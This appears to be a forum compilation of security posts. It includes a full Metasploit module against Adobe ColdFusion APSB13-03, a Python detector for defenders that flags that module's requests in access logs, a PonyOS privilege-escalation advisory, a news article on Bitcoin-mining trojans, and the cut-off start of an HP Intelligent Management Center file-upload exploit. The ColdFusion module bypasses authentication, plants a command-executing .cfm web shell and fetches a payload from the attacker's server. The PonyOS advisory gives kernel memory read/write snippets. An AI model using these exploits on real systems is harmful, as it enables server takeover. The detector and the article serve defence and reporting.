  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Adobe ColdFusion APSB13-03',
      'Description' => %q{
        This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03:

          * CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only)
          * CVE-2013-0629: directory traversal
          * CVE-2013-0632: authentication bypass
      },
      'Author'      =>
        [
          'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-0625'],
          [ 'CVE', '2013-0629'],
          # we don't actually exploit this, as this is the backdoor
          # dropped by malware exploiting the other vulnerabilities
          [ 'CVE', '2013-0631'],
          [ 'CVE', '2013-0632'],
        ],
      'Targets'     =>
        [
          ['Automatic Targeting', { 'auto' => true }],
          [ 'Universal CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => ['unix', 'win', 'linux']
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'Privileged'     => true,
      'Platform'       => [ 'win', 'linux' ],
      'DisclosureDate' => 'Jan 15 2013'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
        OptBool.new('USERDS', [ true, 'Authenticate with RDS credentials', true ]),
        OptString.new('CMD', [ false, 'Command to run rather than dropping a payload', '' ]),
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('DELETE_TASK', [ true, 'Delete scheduled task when done', true ]),
      ], self.class)
  end

  def check
    exploitable = 0
    exploitable += 1 if check_cve_2013_0629
    exploitable += 1 if check_cve_2013_0632
    exploitable > 0 ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Login any way possible, returning the cookies if successful, empty otherwise
  def login
    cf_cookies = {}
    ways = {
      'RDS bypass' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], true) },
      'RDS login' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], false) },
      'Administrator login' => Proc.new { |foo| administrator_login(datastore['USERNAME'], datastore['PASSWORD']) },
    }
    ways.each do |what, how|
      these_cookies = how.call
      if got_auth? these_cookies
        print_status "Authenticated using '#{what}' technique"
        cf_cookies = these_cookies
        break
      end
    end
    fail_with(Exploit::Failure::NoAccess, "Unable to authenticate") if cf_cookies.empty?
    cf_cookies
  end

  def exploit
    # login
    cf_cookies = login

    # if we managed to login, get the listener ready
    datastore['URIPATH'] = rand_text_alphanumeric(6)
    srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
    start_service

    # drop a payload on disk which we can used to execute
    # arbitrary commands, which will be needed regardless of
    # which technique (cmd, payload) the user wants
    input_exec = srv_uri + "/#{datastore['URIPATH']}-e"
    output_exec = "#{datastore['URIPATH']}-e.cfm"
    schedule_drop cf_cookies, input_exec, output_exec

    if datastore['CMD'] and not datastore['CMD'].empty?
      # now that the coldfusion exec is on disk, execute it,
      # passing in the command and arguments
      parts = datastore['CMD'].split(/\s+/)
      res = execute output_exec, parts.shift, parts.join(' ')
      print_line res.body.strip
    else
      # drop the payload
      input_payload = srv_uri + "/#{datastore['URIPATH']}-p"
      output_payload = "#{datastore['URIPATH']}-p"
      schedule_drop cf_cookies, input_payload, output_payload
      # make the payload executable
      # XXX: windows?
      execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}"
      # execute the payload
      execute output_exec, "../../wwwroot/CFIDE/#{output_payload}"
    end

    handler
  end

  def execute cfm, cmd, args=''
    uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}"
    send_request_raw(
      {
        'uri' => uri,
        'method' => 'GET'
      }, 25
    )
  end

  def on_new_session(client)
    return # TODO: cleanup
    if client.type == "meterpreter"
      client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
      @files.each do |file|
        client.fs.file.rm("#{file}")
      end
    else
      @files.each do |file|
        client.shell_command_token("rm #{file}")
      end
    end
  end

  def on_request_uri cli, request
    cf_payload = "test"
    case request.uri
    when "/#{datastore['URIPATH']}-e"
      cf_payload = <<-EOF
<cfparam name="url.cmd" type="string" default="id"/>
<cfparam name="url.args" type="string" default=""/>
<cfexecute name=#url.cmd# arguments=#url.args# timeout="5" variable="output" />
<cfoutput>#output#</cfoutput>
      EOF
    when "/#{datastore['URIPATH']}-p"
      cf_payload = payload.encoded
    end
    send_response(cli, cf_payload, { 'Content-Type' => 'text/html' })
  end

  # Given a hash of cookie key value pairs, return a string
  # suitable for use as an HTTP Cookie header
  def build_cookie_header cookies
    cookies.to_a.map { |a| a.join '=' }.join '; '
  end

  # this doesn't actually work
  def twiddle_csrf cookies, enable=false
    mode = (enable ? "Enabling" : "Disabling")
    print_status "#{mode} CSRF protection"
    params = {
      'SessEnable' => enable.to_s,
    }
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"),
        'method' => 'POST',
        'connection' => 'TE, close',
        'cookie' => build_cookie_header(cookies),
        'vars_post' => params,
      })
    if res
      if res.body =~ /SessionManagement should/
        print_error "Error #{mode} CSRF"
      end
    else
      print_error "No response while #{mode} CSRF"
    end
  end

  # Using the provided +cookies+, schedule a ColdFusion task
  # to request content from +input_uri+ and drop it in +output_path+
  def schedule_drop cookies, input_uri, output_path
    vprint_status "Attempting to schedule ColdFusion task"
    cookie_hash = cookies
    scheduletasks_path = "/CFIDE/administrator/scheduler/scheduletasks.cfm"
    scheduleedit_path = "/CFIDE/administrator/scheduler/scheduleedit.cfm"
    # make a request to the scheduletasks page to pick up the CSRF token
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, scheduletasks_path),
        'method' => 'GET',
        'connection' => 'TE, close',
        'cookie' => build_cookie_header(cookie_hash),
      })
    cookie_hash.merge! get_useful_cookies res
    if res
      # XXX: I can only seem to get this to work if 'Enable Session Variables'
      # is disabled (Server Settings -> Memory Variables)
      token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
      unless token
        print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)"
        #twiddle_csrf cookies, false
        token = ''
      end
    else
      fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for task listing")
    end

    # make a request to the scheduletasks page again, this time passing in our CSRF token
    # in an attempt to get all of the other cookies used in a request
    cookie_hash.merge!
get_useful_cookies res res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?csrftoken=#{token}&submit=Schedule+New+Task", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for new task") unless res # pick a unique task ID task_id = SecureRandom.uuid # drop the backdoor in the CFIDE directory so it can be executed publish_file = '../../wwwroot/CFIDE/' + output_path # pick a start date. This must be in the future, so pick # one sufficiently far ahead to account for time zones, # improper time keeping, solar flares, drift, etc. start_date = "03/15/#{Time.now.strftime('%Y').to_i + 1}" params = { 'csrftoken' => token, 'TaskName' => task_id, 'Group' => 'default', 'Start_Date' => start_date, 'End_Date' => '', 'ScheduleType' => 'Once', 'StartTimeOnce' => '1:37 PM', 'Interval' => 'Daily', 'StartTimeDWM' => '', 'customInterval_hour' => '0', 'customInterval_min' => '0', 'customInterval_sec' => '0', 'CustomStartTime' => '', 'CustomEndTime' => '', 'repeatradio' => 'norepeatforeverradio', 'Repeat' => '', 'crontime' => '', 'Operation' => 'HTTPRequest', 'ScheduledURL' => input_uri, 'Username' => '', 'Password' => '', 'Request_Time_out' => '', 'proxy_server' => '', 'http_proxy_port' => '', 'publish' => '1', 'publish_file' => publish_file, 'publish_overwrite' => 'on', 'eventhandler' => '', 'exclude' => '', 'onmisfire' => '', 'onexception' => '', 'oncomplete' => '', 'priority' => '5', 'retrycount' => '3', 'advancedmode' => 'true', 'adminsubmit' => 'Submit', 'taskNameOriginal' => task_id, 'groupOriginal' => 'default', 'modeOriginal' => 'server', } cookie_hash.merge! 
(get_useful_cookies res) res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), 'vars_post' => params, }) if res # if there was something wrong with the task, capture those errors # print them and abort errors = res.body.scan(/<li class="errorText">(.*)<\/li>/i).flatten if errors.empty? if res.body =~ /SessionManagement should/ fail_with(Exploit::Failure::NoAccess, "Unable to bypass CSRF") end print_status "Created task #{task_id}" else fail_with(Exploit::Failure::NoAccess, "Unable to create task #{task_id}: #{errors.join(',')}") end else fail_with(Exploit::Failure::Unknown, "No response when creating task #{task_id}") end print_status "Executing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) #twiddle_csrf cookies, true if datastore['DELETE_TASK'] print_status "Removing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) end vprint_status normalize_uri(target_uri, publish_file) publish_file end # Given the HTTP response +res+, extract any interesting, non-empty # cookies, returning them as a hash def get_useful_cookies res set_cookie = res.headers['Set-Cookie'] # Parse the Set-Cookie header parsed_cookies = CGI::Cookie.parse(set_cookie) # Clean up the cookies we got by: # * Dropping Path and Expires from the parsed cookies -- we don't care # * Dropping empty (reset) cookies %w(Path Expires).each do |ignore| parsed_cookies.delete ignore parsed_cookies.delete ignore.downcase end parsed_cookies.keys.each do |name| 
parsed_cookies[name].reject! { |value| value == '""' } end parsed_cookies.reject! { |name,values| values.empty? } # the cookies always seem to start with CFAUTHORIZATION_, but # give the module the ability to log what it got in the event # that this stops becoming an OK assumption unless parsed_cookies.empty? vprint_status "Got the following cookies after authenticating: #{parsed_cookies}" end cookie_pattern = /^CF/ useful_cookies = parsed_cookies.select { |name,value| name =~ cookie_pattern } if useful_cookies.empty? vprint_status "No #{cookie_pattern} cookies found" else vprint_status "The following cookies could be used for future authentication: #{useful_cookies}" end useful_cookies end # Authenticates to ColdFusion Administrator via the adminapi using the # specified +user+ and +password+. If +use_rds+ is true, it is assumed that # the provided credentials are for RDS, otherwise they are assumed to be # credentials for ColdFusion Administrator. # # Returns a hash (cookie name => value) of the cookies obtained def adminapi_login user, password, use_rds vprint_status "Attempting ColdFusion Administrator adminapi login" user ||= '' password ||= '' res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => { 'method' => 'login', 'adminUserId' => user, 'adminPassword' => password, 'rdsPasswordAllowed' => (use_rds ? '1' : '0') } }) if res if res.code == 200 vprint_status "HTTP #{res.code} when authenticating" return get_useful_cookies(res) else print_error "HTTP #{res.code} when authenticating" end else print_error "No response when authenticating" end {} end # Authenticates to ColdFusion Administrator using the specified +user+ and # +password+ # # Returns a hash (cookie name => value) of the cookies obtained def administrator_login user, password cf_cookies = administrator_9x_login user, password unless got_auth? 
cf_cookies cf_cookies = administrator_10x_login user, password end cf_cookies end def administrator_10x_login user, password # coldfusion 10 appears to do: # cfadminPassword.value = hex_sha1(cfadminPassword.value) vprint_status "Trying ColdFusion 10.x Administrator login" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'cfadminUserId' => user, 'cfadminPassword' => Digest::SHA1.hexdigest(password).upcase, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'submit' => 'Login', } }) if res if res.code.to_s =~ /^30[12]/ useful_cookies = get_useful_cookies res if got_auth? useful_cookies return useful_cookies end else if res.body =~ /<title>Error/i print_status "Appears to be restricted and/or not ColdFusion 10.x" elsif res.body =~ /A License exception has occurred/i print_status "Is license restricted" else vprint_status "Got unexpected HTTP #{res.code} response when sending a ColdFusion 10.x request. Not 10.x?" vprint_status res.body end end end return {} end def got_auth? cookies not cookies.select { |name,values| name =~ /^CFAUTHORIZATION_/ }.empty? 
end def administrator_9x_login user, password vprint_status "Trying ColdFusion 9.x Administrator login" # coldfusion 9 appears to do: # cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value)); # # You can get a current salt from # http://<host>:8500/CFIDE/adminapi/administrator.cfc?method=getSalt&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc#method_getSalt # # Unfortunately that URL might be restricted and the salt really just looks # to be the current time represented as the number of milliseconds since # the epoch, so just use that salt = (Time.now.to_i * 1000).to_s pass = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), salt, Digest::SHA1.hexdigest(password).upcase).upcase res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'submit' => 'Login', 'salt' => salt, 'cfadminUserId' => user, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'cfadminPassword' => pass, } }) if res return get_useful_cookies res else print_error "No response while trying ColdFusion 9.x authentication" end {} end # Authenticates to ColdFusion ComponentUtils using the specified +user+ and +password+ # # Returns a hash (cookie name => value) of the cookies obtained def componentutils_login user, password vprint_status "Attempting ColdFusion ComponentUtils login" vars = { 'j_password_required' => "Password+Required", 'submit' => 'Login', } vars['rdsUserId'] = user if user vars['j_password'] = password if password res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE componentutils cfcexplorer.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => vars }) cf_cookies = {} if res.code.to_s =~ /^(?:200|30[12])$/ cf_cookies = get_useful_cookies res else print_error "HTTP #{res.code} while attempting ColdFusion ComponentUtils login" end cf_cookies end def check_cve_2013_0629 vulns = 0 paths = %w(../../../license.txt 
../../../../license.html) # first try password-less bypass in the event that this thing # was just wide open vuln_without_creds = false paths.each do |path| if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_creds = true break end end if vuln_without_creds print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 without credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 without credentials" end # if credentials are provided, try those too if datastore['USERNAME'] and datastore['PASSWORD'] vuln_without_bypass = false paths.each do |path| cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_bypass = true break end end if vuln_without_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 with credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 with credentials" end end # now try with the CVE-2013-0632 bypass, in the event that this wasn't *totally* wide open vuln_with_bypass = false paths.each do |path| cf_cookies = adminapi_login datastore['USERNAME'], datastore['PASSWORD'], true # we need to take the cookie value from CFAUTHORIZATION_cfadmin # and use it for CFAUTHORIZATION_componentutils cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies.delete 'CFAUTHORIZATION_cfadmin' if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_with_bypass = true break end end if vuln_with_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" end vulns > 0 end # Checks for CVE-2013-0632, returning true if the target is # vulnerable, false otherwise def check_cve_2013_0632 if datastore['USERDS'] # 
the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # subsequently *enabled* after install, the password is unset so we simply must # check that and only that. cf_cookies = adminapi_login 'foo', 'bar', true if cf_cookies.empty? print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" else print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0632" return true end else print_error "Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off" end false end def traverse_read path, cookies uri = normalize_uri(target_uri.path) uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << path res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies) }) res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') end end Sursa: Adobe ColdFusion APSB13-03 Remote Exploit
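From the defender's side, the module above leaves a recognisable trail in the ColdFusion web server's access log: a cfcexplorer.cfc request with `..` in its path parameter (CVE-2013-0629), a POST to scheduleedit.cfm followed by a runtask= GET against scheduletasks.cfm, and a freshly dropped .cfm under /CFIDE/ driven with cmd=. The following detector is an added example, not part of the module or the Metasploit project; the log lines it runs over are constructed, and the task name and stub file name in them are placeholders.

```python
"""Detection for the ColdFusion APSB13-03 request chain in web access logs.

Added example, not part of the Metasploit module above. It parses
Combined Log Format lines and flags the request shapes the module sends.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CFCEXPLORER = "/cfide/componentutils/cfcexplorer.cfc"
SCHEDULEEDIT = "/cfide/administrator/scheduler/scheduleedit.cfm"
SCHEDULETASKS = "/cfide/administrator/scheduler/scheduletasks.cfm"

# Constructed sample: one host runs the full chain, another browses normally.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Jan/2013:10:00:01 +0000] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=../../../license.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:10:00:02 +0000] "POST /CFIDE/adminapi/administrator.cfc HTTP/1.1" 200 2 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:10:00:03 +0000] "GET /CFIDE/administrator/scheduler/scheduletasks.cfm?csrftoken=&submit=Schedule+New+Task HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:10:00:04 +0000] "POST /CFIDE/administrator/scheduler/scheduleedit.cfm HTTP/1.1" 200 120 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:10:00:05 +0000] "GET /CFIDE/administrator/scheduler/scheduletasks.cfm?runtask=3f2a-task&csrftoken=&group=default&mode=server HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Jan/2013:10:00:06 +0000] "GET /CFIDE/aB3xYz-e.cfm?cmd=id&args= HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Jan/2013:10:01:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into ip, method, decoded path and query dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = unquote(url.path).lower()
    rec["query"] = {k.lower(): v for k, v in parse_qs(url.query).items()}
    return rec


def analyse(lines):
    """Return (ip, rule, evidence) tuples for requests matching the chain."""
    findings = []
    posted_task = defaultdict(bool)  # ip -> POSTed to scheduleedit.cfm earlier
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, q = rec["ip"], rec["path"], rec["query"]
        # CVE-2013-0629: '..' or an absolute path in cfcexplorer's path parameter
        if path == CFCEXPLORER:
            for p in q.get("path", []):
                if ".." in p or p.startswith("/"):
                    findings.append((ip, "cfcexplorer-traversal", p))
        # Scheduler abuse: a task is created and then run straight away
        if path == SCHEDULEEDIT and rec["method"] == "POST":
            posted_task[ip] = True
        if path == SCHEDULETASKS and "runtask" in q and posted_task[ip]:
            findings.append((ip, "task-created-then-run", q["runtask"][0]))
        # The dropped .cfm stub is driven by cmd=/args= on a /CFIDE/ page
        if path.startswith("/cfide/") and path.endswith(".cfm") and "cmd" in q:
            findings.append((ip, "cfide-cmd-stub", "cmd=" + q["cmd"][0]))
    return findings


if __name__ == "__main__":
    for hit in analyse(SAMPLE_LOG.splitlines()):
        print(hit)
```

The adminapi login with rdsPasswordAllowed=1 (CVE-2013-0632) travels in a POST body and is not visible in a plain access log; checking that RDS has a password set, or is disabled, remains a configuration audit.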
10. PonyOS version 0.499-mlp suffers from privilege escalation due to the cat binary being executed with escalated privileges while file permissions do not work. It also has a kernel compromise vulnerability.

Advisory: PonyOS Security Issues
John Cartwright <johnc@grok.org.uk>

Introduction
------------

Like countless others, I was pretty excited about PonyOS yesterday (April 1st 2013) and decided to give it a go. After wasting a lot of time nyan'ing, I knew this was the future of desktop OSes. However, I wondered how secure PonyOS really was. So, I took a look at the source, which revealed that our ponies may be in danger of compromise!

All bugs tested against PonyOS 0.4.99-mlp from ponyos.org.

Userland Compromise
-------------------

Take a look at this snippet from login.c:

        int uid = checkUserPass(username, password);

        if (uid < 0) {
            fprintf(stdout, "\nLogin failed.\n");
            continue;
        }

        system("cat /etc/motd");

        pid_t pid = getpid();
        uint32_t f = fork();

        if (getpid() != pid) {
            /* TODO: Read appropriate shell from /etc/passwd */
            set_username();
            set_homedir();
            set_path();

            char * args[] = { "/bin/sh", NULL };
            syscall_setuid(uid);
            int i = execvp(args[0], args);

It seems that login runs 'cat' before dropping privileges. This is easy to exploit, given that the file permissions don't work. Just log in as 'local', and replace the 'cat' binary with another ELF - 'whoami' will do nicely for a PoC. Then log out, and back in again. This causes your binary to run as uid 0. Exciting stuff!

Kernel Compromise
-----------------

Obviously userland exploits are boring and it was important that I find some kernel holes to play with. Luckily PonyOS has quite a few for your enjoyment.

You can abuse syscall_fstat() to write the contents of the stat buf to an arbitrary kernel location if you so wish. There are a few other similar bugs where pointers aren't sanitised, too.

    static int stat(int fd, uint32_t st) {
        if (fd >= (int)current_process->fds->length || fd < 0) {
            return -1;
        }
        fs_node_t * fn = current_process->fds->entries[fd];
        struct stat * f = (struct stat *)st;
        f->st_dev   = 0;
        f->st_ino   = fn->inode;
        ...
        f->st_mode  = fn->mask | flags;
        f->st_nlink = 0;
        f->st_uid   = fn->uid;
        f->st_gid   = fn->gid;
        f->st_rdev  = 0;
        f->st_size  = fn->length;

This is all well and good, but for today's silliness^h^h^h^h^h^h^h^h^himportant security audit I decided to exploit the ioctl handler found in tty.c:

    int pty_ioctl(pty_t * pty, int request, void * argp) {
        debug_print(WARNING, "Incoming IOCTL request %d", request);
        switch (request) {
            case TIOCSWINSZ:
                debug_print(WARNING, "Setting!");
                memcpy(&pty->size, argp, sizeof(struct winsize));
                /* TODO send sigwinch to fg_prog */
                return 0;
            case TIOCGWINSZ:
                memcpy(argp, &pty->size, sizeof(struct winsize));
                return 0;
            default:
                return -1; /* TODO EINV... something or other */
        }
        return -1;
    }

Printing WARNING to the console is fine, but the ponies won't get the message. What we have here is pretty much an arbitrary read/write of kernel memory.

Want to read the value of 0x11223344 ?

    struct winsize ws;
    ioctl(0, TIOCSWINSZ, (void *)0x11223344);
    ioctl(0, TIOCGWINSZ, &ws);
    printf("%x %x %x %x\n", ws.ws_col, ws.ws_row, ws.ws_xpixel, ws.ws_ypixel);

Want to zero the memory at that address?

    struct winsize ws;
    memset(&ws, '\0', sizeof(struct winsize));
    ioctl(0, TIOCSWINSZ, &ws);
    ioctl(0, TIOCGWINSZ, (void *)0x11223344);

Using these two primitives it is possible to dump out a large chunk of the kernel memory, find the process list, user_t, etc and patch it appropriately to change your uid.

There's a screenshot of an exploit in action at: http://www.grok.org.uk/advisories/findus.jpg

However, the 'findus' code is not 'stable' enough to share right now.

Mitigating Factors
------------------

PonyOS doesn't come with a compiler, or any remote access, so it is quite difficult to exploit unless you build your exploit code into the OS image.

Having said that, there are some other bugs that could help you if you really wanted to attack PonyOS, given command line access. For example, there is a perfectly good format string bug in the shell:

    for (int i = 0; i < shell_commands_len; ++i) {
        if (strstr(shell_commands[i], argv[0]) == shell_commands[i]) {
            list_insert(matches, shell_commands[i]);
            match = shell_commands[i];
        }
    }
    if (matches->length == 0) {
        list_free(matches);
        return;
    } else if (matches->length == 1) {
        for (int j = 0; j < strlen(context->buffer); ++j) {
            printf("\010 \010");
        }
        printf(match);

This can be triggered by going into /bin and creating an empty file called (for example) %08x%08x. Perhaps you could use the excellent 'bim' editor for this task. Then, re-execute the shell, and use the tab-completion functionality to trigger the format string bug. Just a few short pony-sized steps to go from there to injecting arbitrary code to exploit the system call issues.

Alternatively you might want to pass an invalid TERM to nyancat:

    char * nterm = getenv("TERM");
    if (nterm) {
        strcpy(term, nterm);
    }

Unfortunately the only way I could find to set this value was the shell's 'export' builtin, and long lines crash the shell (512 byte buffer...) so I haven't played with that bug yet, or indeed this other crash.

Conclusion
----------

There's so much to see and do! I don't think PonyOS will be replacing my other systems anytime soon, but it is an interesting project worthy of your attention. I mean, it has ponies *and* massive security holes! What's not to like?

In all seriousness I accept the fact that the OS isn't meant to be secure in any way and I have essentially wasted 24 hours of my life horsing around with it.

Sursa: PonyOS 0.4.99-mlp Privilege Escalation ≈ Packet Storm
11. Maybe it’s a sign of the Bitcoin bubble. Criminals are trying to take control of PCs and turn them into Bitcoin miners.

According to antivirus seller Kaspersky Lab, there’s a new Trojan — spotted just yesterday and spreading via Skype — that takes control of infected machines and forces them to do what is known as Bitcoin mining, a way of earning digital currency.

The Bitcoin digital currency system rewards miners (in Bitcoins, natch) for their number-crunching work, which is essential to keeping the anonymous Bitcoin currency system working. With the Trojan, hackers are forcing others’ machines to earn them money, and it can really put a strain on these machines. Victims might notice that their CPU usage shoots sky high.

Yesterday, the Trojan was spreading via Skype messages. In one Spanish message obtained by Kaspersky, the Trojan was supposed to be a “favorite” picture of the victim. About two thousand people per hour were clicking on the website hosting the Trojan software, Kaspersky said.

“Most of potential victims live in Italy then Russia, Poland, Costa Rica, Spain, Germany, Ukraine and others,” Kaspersky Researcher Dmitry Bestuzhev wrote in a blog post.

Once computer criminals have tricked you into downloading a Trojan, they have control of your computer, and there are a lot of things they could do. And the Trojan isn’t only used for Bitcoin mining, Kaspersky says.

This isn’t the first time a Bitcoin mining Trojan has popped up, and malicious software that flat-out steals bitcoins has been around for years. Two years ago, Symantec spotted a Trojan — called Badminer — that sniffed out graphical processing units and used them to crank out bitcoins.

A regular PC wouldn’t be able to do much Bitcoin mining on its own, but hackers could pretty easily register a group of compromised computers with a specific Bitcoin mining pool and point all of the systems there, according to Charlie Shrem, the founder of Bitcoin payment processor Bitinstant.

“If he infiltrates a million computers, then it will pay off,” he said in an email message.

Bitcoins have been on a price surge lately. Right now, they’re trading at about $140, about ten times their value at the end of last year. Maybe that makes mining a little more attractive to the bad guys.

Sursa: Trojan Turns Your PC Into Bitcoin Mining Slave | Wired Enterprise | Wired.com
12. HP Intelligent Management Center Arbitrary File Upload

Posted Mar 26, 2013
Authored by rgod, juan vazquez | Site metasploit.com

This Metasploit module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in an insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This Metasploit module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Intelligent Management Center Arbitrary File Upload',
      'Description'    => %q{
        This module exploits a code execution flaw in HP Intelligent Management
        Center. The vulnerability exists in the mibFileUpload which is accepting
        unauthenticated file uploads and handling zip contents in an insecure way.
        Combining both weaknesses a remote attacker can accomplish arbitrary file
        upload. This module has been tested successfully on HP Intelligent
        Management Center 5.1 E0202 over Windows 2003 SP2.
      },
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-5201' ],
          [ 'OSVDB', '91026' ],
          [ 'BID', '58385' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ],
          [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 07 2013'))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc'])
      ], self.class)
  end

  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
      'method' => 'GET'
    })
    if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
